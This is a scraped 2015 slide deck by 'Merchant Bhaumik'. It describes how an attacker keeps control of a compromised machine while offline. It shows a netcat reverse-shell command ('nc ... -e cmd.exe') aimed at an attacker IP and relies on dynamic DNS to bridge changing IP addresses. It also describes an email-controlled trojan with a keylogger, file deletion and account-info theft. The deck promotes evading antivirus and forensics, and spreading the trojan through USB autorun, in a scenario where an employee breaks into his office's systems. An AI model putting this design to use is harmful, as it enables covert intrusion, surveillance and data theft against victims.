handle explotion of remote system without being online (merchant bhaumik)
Post on 26-May-2015
1.423 Views
Preview:
DESCRIPTION
TRANSCRIPT
Handle Explotion of Remote System
Without Being Online !!
By
Merchant Bhaumik
Who Am I ?
• Currently Helping local law-enforcement And HelpingIn Securing Some Government Websites
• Developer Of IND 360 Intrusion Detection System ( Host Based As Well As Network Based Detection )
• Communicating with Metasploit Guys To Develop TermCalled “ Universal Payload”
Presentation Flow…….
•Reverse Shell Using Dynamic-Dns Concepts
• Getting Data From Victim Computer Using EmailTool
We Will Understand This Mechanism By Considering
One Scenario……..
Jack’s Situaion……….Jack Working In A Company ...............!
In Which All Computers Behind The NAT BOX……. ………………………!
And He Just Decided To Break One Of TheSystem Of His Office And Getting Shell FromOffice To Home Computer
Problems For Jack….
•Company Has NIDS/IPS ( Network IDS ) …..So No In Bound Connections………….
•He Don’t Know What IP Address IsAllocated By His ISP
•He Can’t Use Any Mechanism Which Constantly Sends Some OutBound Traffic
Good Thing For Jack….
• Jack’s Office Allow Him To Access His GmailAccount..N Allow Some OutBound Traffic..
I
# INCLUDE< REVERSE SHELL >
Why Reverse Shell ?
•Reverse Shell is one of the powerful method for Bypassing Network Intrusion Detection Systems , Firewalls ( Most Of The) etc
• Because Some of this network intrusion only monitors In-bound connection … Not the Out-bound ……
• Jack Has DMZ Network In His Office…..
Diagram 1
INTERNET
192.168.1.2
192.168.1.1
192.168.1.3
192.168.1.4
192.168.1.5
117.254.4.123( PUBLIC IP )
49.24.3.12( INDIVIDUAL IP )
D
M
Z
Diagram 2 (Normal Attack ! )
INTERNET
192.168.1.2
192.168.1.1
192.168.1.3
192.168.1.4
117.254.4.123( PUBLIC IP )
49.24.3.12( Attacker IP )
D
M
Z
Victim
nc 49.24.3.12 4343 –e cmd.exe
Step I : Start Handler on port 4343nc –l –p 4343
Step II :
Normal Flow Of Getting Reverse
Shell
Attacker Starts Handler
Vuln. Injection N All that !
Victim Sends Reverse Shell … To Attacker Machine !..
For Reverse Shell Scenario !
Attacker Wins !
Exploit !
But What’s Wrong With Jack?
He Don’t Know What IP Address IsAllocated To His Computer
( Dynamic IP Allocation By ISPs)
Solution….
Attacker Is “Offline” But Still He Will Get Reverse Shell
My Way…….
Attacker Starts Handler
Vuln. Injection N All that !
Victim Sends Reverse Shell … To Attacker Machine !..
For Reverse Shell Scenario !
Attacker Wins !
Exploit !
Starting Handler On Local Machine Is Optional !
Flow Of Execution……Attacker !
Attack
Exe Running inVictim Machine
Attacker Update IP?
Attacker Receives Reverse Shell
Yes !!
No !!
* If Attacker is not online still the exe is up and running in remote machine and if attacker updates DNS records… The Reverse Shell Is On The Attacker’s Desk !!
Mechanism
• If the Code ( First Part ) receives positive Acknowledgement of
sending packets …………Jack Will Get Reverse Shell…………….
•Else keep running in the victim machine and waits for Ack.
From attacker’ machine…
Dynamic DNS Way…. (Initially ! )• First Part : catchme.dyndns-ip.com ( 255.255.255.255 ) • Second Part : payload.dyndns-ip.com ( 255.255.255.255 )
First Part
Second Part
SynchronousExecution
( Single EXE )
NEW FINAL EXE CONSIST OF
New.exe
Dynamic DNS Way…. (Finally ! )• First Part : catchme.dyndns-ip.com ( 127.0.0.1 ) • Second Part : payload.dyndns-ip.com (Attacker’s IP )
First Part
Second Part
SynchronousExecution
( Single EXE )
NEW FINAL EXE CONSIST OF
New.exe
Metasploit………….!!!!!•You can embed my method (or My Exe ) with metasploit Payload which is of yourchoice . * The Structure of new Exe will be as per follow :
My Tool
MSF PAYLOAD( LHOST = Dynamic )
SynchronousExecution
( Single EXE )
NEW FINAL EXE CONSIS OF
New.exe
Hands On NetWork
INTERNET
192.168.1.2
192.168.1.1
192.168.1.3
192.168.1.4
192.168.1.5
117.254.4.123( PUBLIC IP )
49.24.3.12( INDIVIDUAL IP )
D
M
Z
Time To Enjoy Cooked Cookies And
Recipes !!
Demo
I I
# INCLUDE <EMAIL TOOL >
Normal Remote Trojans & Viruses !
Attacker
(Must Be Online !)
Victim
(Must Be Online !)
My Tool !!
Attacker
MAY
OR
MAY NOT ONLINE !!
Victim
MAY
OR
MAY NOT ONLINE !!
Caution: No Need To Be Online !!
Attackers !!
So, How It Works ??
Attacker Victim
Zombie
But, Who Is Zombie??
@ It may be one of the below :
It is one of like it…….
Or one like this…..
Or like this…….
Features !!
Execute Operating System Level Commands By Using Emails !
Get all Network Card Information with Allocated IP Addresses !
Live Tracking Of the System being used by victim !
Get All available account‟ List !
Enable/Disable Key Logger !
This All Stuff With Gmail , Yahoo , Hotmail………!!
About It !It is a simple application which Once Up & Going on Victim‟
Computer , Attacker can Handle it using Gmail , Yahoo , Hotmail
Email Services…
There is no need to be Online for Attacker to attack the Victim
System…..
Attacker Has to send attack instructions to Any of the mail
service & then it is like sitting on the door & watching the event ,
“ when it‟s gonna open !!”
As Victim Connects to the internet …. Attack Launches & the
results are automatically sent back to the Attacker‟s email
Address…..
Cool Benefits !!
If the email account is used by using One of like below then it is totally Anti-
Forensic ! No Reverse Detection Is Possible !
Create Unique password for all individual victims who are
infected …
Ability to handle multiple clients simultaneously …..
Delete Files In Victims Computer by Simply Sending An Email..
No Antivirus Can Detect Attack Because Of HTTPS ……
Tool Syntax …..
Password_For_Victim “: “Task_Commands”:”
E.g. Pwd$98$ : Account_info :
“Pwd$98$” is Password
For The Particular Victim…
Command Which Sends back
Email Containing Account Info In
Victim Computer !
Snap Shot 1…(Load Attack Instructions)
Send Account info Of Victim..
Send Drive Info Of Victim…
Sends Mac , Network card Info...
Password For Individual Victim
Snap Shot 2…(Get Back Attack Result)
My Emaill Account …… !
Attached Info Of Victims Computer…!
As Per Of Attacker‟ Choice
Why Gmail ??
No Fear Of Detection 1
No Direct Connection Between Attacker & Victim
Attacker
Victim
No Fear Of Detection 2
No Virus Detection Due To HTTPS…..No Digital Signatures !! Ability To Distruct It
Self…….!
How To Spread This Code??
Autorun.inf by USB Drives……….
Phisical Access Of Victim‟s System…..
During Metasploit Explotion ……
Further Possible Development !!
This Code Is Flexible Enough To Develop Further By My Hacker
Friends….It Is Also Possible For Future To Send Exploits Or
Trojans By Using This Code…….
Any One Can Send Exploits , Trojans , RootKits , BackDoors By
Simply Attaching It With Email And Sending It To His Own Account
Or Account That is Configured In Victim‟ Code………
Pros N Cons 1 ! ( Be Transparent !! )
Advantages are that the attacker never goin to caught if he/she
using the browser like TOR , Anononymizer , VPNs or Any
PROXy…. For accessing the attacking gmail account.
No Antivirus can detect the Instruction data because all traffic
gonna come from HTTPS …..!
Only single email account of gmail goin to use for both the side.
Attacker and victim machine both goin to connect same account
but attacker knows ,But Victim Don‟t !!
Pros N Cons 2
Disadvantage is that , if the victim has habit of checking the
current connections using commands like „netstat –n‟ then
possibility to detect Gmail connection when actually there is no
browser activity. But still it is difficult to detect ………. Because
process is running in Hidden mode….
Hands On Time..!
( Demo)
For More……
backdoor.security@gmail.com
Thanks Guys
For Checking
It Out …….!
top related